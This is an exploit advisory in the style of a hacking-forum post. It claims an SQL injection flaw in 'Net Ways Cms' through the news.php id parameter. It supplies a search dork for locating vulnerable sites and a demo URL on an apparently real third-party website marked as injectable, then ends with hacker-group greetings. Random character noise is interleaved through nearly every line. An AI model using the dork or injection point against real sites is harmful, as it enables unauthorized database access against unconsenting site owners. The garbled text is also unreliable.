################################################################################??######## ) z' Y3 K) @1 N Y& H4 x7 [* b
#
8 _! `2 `" D" u% i# Exploit Title : Net Ways Cms Sql Injection Vulnerability
l9 z6 z' c( z" m#
) i+ @, n2 ] X; Z4 e# Author : IrIsT.Ir
, h/ w ^- {9 ~& ?. o; J0 b* e" ~# 4 U* m2 `6 Z _7 n' i5 r- F0 {
# Discovered By : Am!r ( n$ E8 r$ m7 m( |& H
# ( V2 p6 Q, C3 N, @
# Home : http://IrIsT.Ir/forum - y" q2 o' i H4 D
# * |5 C b" t5 u9 M& G
# Software Link : http://www.netways.com/ www.political-security.com8 n m1 n9 h/ D
# - n# L3 d- }" U- p7 t
# Security Risk : High
( B. M8 b ~& Y6 R# & _( e) c9 d$ ?: f. J& b
# Version : All Version ]& Q1 P; I! U
#
& c: s0 A* N% r0 ]3 @# Tested on : GNU/Linux Ubuntu - Windows Server - win7 . [7 e V( z1 [) Y, w
# . q; ~" E+ S# ?
# Dork : intext:"Designed & developed by NetWays" / d$ b; ?, @, g( m- O r9 {
# ( R; I' z0 x) D) e- a
################################################################################??########
, ~) j4 y! S, x% h7 o- O$ M# j0 E#
# I. B X5 p5 W# Z# Expl0iTs :
$ r# h, [- H, y( p( d# 6 C5 j& Y8 i# ]4 f$ A8 h& X5 q
# http://target.com/news.php?id=[Sql] 8 [. s4 d2 I" D1 g( D9 G
# 8 t8 B1 i6 X5 E1 J/ L" x7 _
# ' `. z9 I% `5 C5 Z9 q$ g, L" G* G. F3 g
# D3mo : + x5 H e4 l3 t: d" M1 `% ]
#
. H! l) @3 Z+ I& D# |9 e: j- t# http://compagnieparento.com/news.php?id=7[Sql] 8 _ y$ d6 B# q
# * c1 Z8 R4 ]" Q; W, {
################################################################################??######## 2 R: s4 d+ c# Q# ?$ K1 p
# ( w% p# d8 s/ J8 z" F9 R/ x
# Greats : B3HZ4D - nimaarek - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r % z" b/ m4 z; ^) [
# . k8 T* ?6 {) H" z$ d8 o( u
# 0x0ptim0us - TaK.FaNaR - m3hdi - F@rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - d3c0d3r
5 X# W/ \9 a! s# I4 K' H#
, Z+ ]3 U% ` z* U# q# Mr.Xpr & M.R.S.CO & Mr.Cicili & H-SK33PY & All Members In Www.IrIsT.Ir/forum 4 ~% b/ N9 J9 b* n% s2 g2 f0 \6 G
# . L, n1 g$ B( G: \- k% e- r9 O
################################################################################??######## |